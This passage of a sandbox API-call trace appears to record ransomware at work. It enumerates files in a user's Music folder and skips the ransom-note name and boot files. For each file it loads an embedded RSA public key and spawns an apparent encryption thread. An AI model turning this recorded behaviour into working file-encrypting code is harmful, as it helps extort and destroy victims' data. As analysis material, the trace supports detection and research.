nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0049.283] CloseHandle (hObject=0x5d0) returned 1 [0049.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0049.283] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0049.283] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0049.283] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0049.283] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0049.283] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0049.283] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0049.283] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0049.283] SetErrorMode (uMode=0x1) returned 0x1 [0049.283] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0049.283] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.283] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.283] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0049.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0049.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="Music" [0049.283] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0049.283] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.283] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.283] lstrcmpW (lpString1="11DaFVcd U6Q75nbu_.wav", lpString2="..") returned 1 [0049.284] lstrcmpW (lpString1="11DaFVcd U6Q75nbu_.wav", lpString2=".") returned 1 [0049.284] StrStrW (lpFirst="11DaFVcd U6Q75nbu_.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0049.284] StrStrW (lpFirst="11DaFVcd U6Q75nbu_.wav", lpSrch="ntldr") returned 0x0 [0049.284] StrStrW (lpFirst="11DaFVcd U6Q75nbu_.wav", lpSrch="NTLDR") returned 0x0 [0049.284] StrStrW (lpFirst="11DaFVcd U6Q75nbu_.wav", lpSrch="NTDETECT.COM") returned 0x0 [0049.284] StrStrW (lpFirst="11DaFVcd U6Q75nbu_.wav", lpSrch="ntdetect.com") returned 0x0 [0049.284] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0049.284] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0049.284] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0049.284] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.284] lstrcpyW (in: lpString1=0x17cf1c, lpString2="11DaFVcd U6Q75nbu_.wav" | out: lpString1="11DaFVcd U6Q75nbu_.wav") returned="11DaFVcd U6Q75nbu_.wav" [0049.284] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5d4 [0049.284] Sleep (dwMilliseconds=0x96) [0049.432] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.432] lstrcmpW (lpString1="2_r9zrnyCzzJ.mp3", lpString2="..") returned 1 [0049.432] lstrcmpW (lpString1="2_r9zrnyCzzJ.mp3", lpString2=".") returned 1 [0049.432] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0049.432] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="ntldr") returned 0x0 [0049.432] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="NTLDR") returned 0x0 [0049.432] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0049.432] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="ntdetect.com") returned 0x0 [0049.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0049.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0049.432] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0049.432] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.432] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2_r9zrnyCzzJ.mp3" | out: lpString1="2_r9zrnyCzzJ.mp3") returned="2_r9zrnyCzzJ.mp3" [0049.432] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.432] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130 [0049.433] Sleep (dwMilliseconds=0x96) [0049.588] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.588] lstrcmpW (lpString1="8YglZU.wav", lpString2="..") returned 1 [0049.588] lstrcmpW (lpString1="8YglZU.wav", lpString2=".") returned 1 [0049.588] StrStrW (lpFirst="8YglZU.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0049.588] StrStrW (lpFirst="8YglZU.wav", lpSrch="ntldr") returned 0x0 [0049.588] StrStrW (lpFirst="8YglZU.wav", lpSrch="NTLDR") returned 0x0 [0049.588] StrStrW (lpFirst="8YglZU.wav", lpSrch="NTDETECT.COM") returned 0x0 [0049.588] StrStrW (lpFirst="8YglZU.wav", lpSrch="ntdetect.com") returned 0x0 [0049.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0049.589] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0049.589] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0049.589] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.589] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8YglZU.wav" | out: lpString1="8YglZU.wav") returned="8YglZU.wav" [0049.589] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5b4 [0049.589] Sleep (dwMilliseconds=0x96) [0049.744] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.744] lstrcmpW (lpString1="Ae42UeoE.wav", lpString2="..") returned 1 [0049.744] lstrcmpW (lpString1="Ae42UeoE.wav", lpString2=".") returned 1 [0049.744] StrStrW (lpFirst="Ae42UeoE.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0049.744] StrStrW (lpFirst="Ae42UeoE.wav", lpSrch="ntldr") returned 0x0 [0049.744] StrStrW (lpFirst="Ae42UeoE.wav", lpSrch="NTLDR") returned 0x0 [0049.744] StrStrW (lpFirst="Ae42UeoE.wav", lpSrch="NTDETECT.COM") returned 0x0 [0049.744] StrStrW (lpFirst="Ae42UeoE.wav", lpSrch="ntdetect.com") returned 0x0 [0049.744] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0049.744] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0049.744] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0049.744] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.745] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Ae42UeoE.wav" | out: lpString1="Ae42UeoE.wav") returned="Ae42UeoE.wav" [0049.745] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5c0 [0049.745] Sleep (dwMilliseconds=0x96) [0049.900] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.900] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.900] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.900] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.900] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0049.900] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0049.900] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0049.901] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0049.901] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0049.901] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0049.901] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0049.901] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0049.901] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.901] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.901] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e8 [0049.901] Sleep (dwMilliseconds=0x96) [0050.056] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.056] lstrcmpW (lpString1="ImbzlHSAeRD0mYdABk.mp3", lpString2="..") returned 1 [0050.056] lstrcmpW (lpString1="ImbzlHSAeRD0mYdABk.mp3", lpString2=".") returned 1 [0050.056] StrStrW (lpFirst="ImbzlHSAeRD0mYdABk.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0050.056] StrStrW (lpFirst="ImbzlHSAeRD0mYdABk.mp3", lpSrch="ntldr") returned 0x0 [0050.056] StrStrW (lpFirst="ImbzlHSAeRD0mYdABk.mp3", lpSrch="NTLDR") returned 0x0 [0050.056] StrStrW (lpFirst="ImbzlHSAeRD0mYdABk.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0050.056] StrStrW (lpFirst="ImbzlHSAeRD0mYdABk.mp3", lpSrch="ntdetect.com") returned 0x0 [0050.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0050.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0050.057] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0050.057] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.057] lstrcpyW (in: lpString1=0x17cf1c, lpString2="ImbzlHSAeRD0mYdABk.mp3" | out: lpString1="ImbzlHSAeRD0mYdABk.mp3") returned="ImbzlHSAeRD0mYdABk.mp3" [0050.057] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e0 [0050.057] Sleep (dwMilliseconds=0x96) [0050.212] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.212] lstrcmpW (lpString1="JKoqX.wav", lpString2="..") returned 1 [0050.212] lstrcmpW (lpString1="JKoqX.wav", lpString2=".") returned 1 [0050.212] StrStrW (lpFirst="JKoqX.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0050.212] StrStrW (lpFirst="JKoqX.wav", lpSrch="ntldr") returned 0x0 [0050.212] StrStrW (lpFirst="JKoqX.wav", lpSrch="NTLDR") returned 0x0 [0050.212] StrStrW (lpFirst="JKoqX.wav", lpSrch="NTDETECT.COM") returned 0x0 [0050.212] StrStrW (lpFirst="JKoqX.wav", lpSrch="ntdetect.com") returned 0x0 [0050.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0050.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0050.213] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0050.213] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.213] lstrcpyW (in: lpString1=0x17cf1c, lpString2="JKoqX.wav" | out: lpString1="JKoqX.wav") returned="JKoqX.wav" [0050.213] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5cc [0050.213] Sleep (dwMilliseconds=0x96) [0050.369] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0050.369] lstrcmpW (lpString1="yV_ r.m4a", lpString2="..") returned 1 [0050.369] lstrcmpW (lpString1="yV_ r.m4a", lpString2=".") returned 1 [0050.369] StrStrW (lpFirst="yV_ r.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0050.369] StrStrW (lpFirst="yV_ r.m4a", lpSrch="ntldr") returned 0x0 [0050.369] StrStrW (lpFirst="yV_ r.m4a", lpSrch="NTLDR") returned 0x0 [0050.369] StrStrW (lpFirst="yV_ r.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0050.369] StrStrW (lpFirst="yV_ r.m4a", lpSrch="ntdetect.com") returned 0x0 [0050.369] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0050.369] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0050.369] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0050.369] 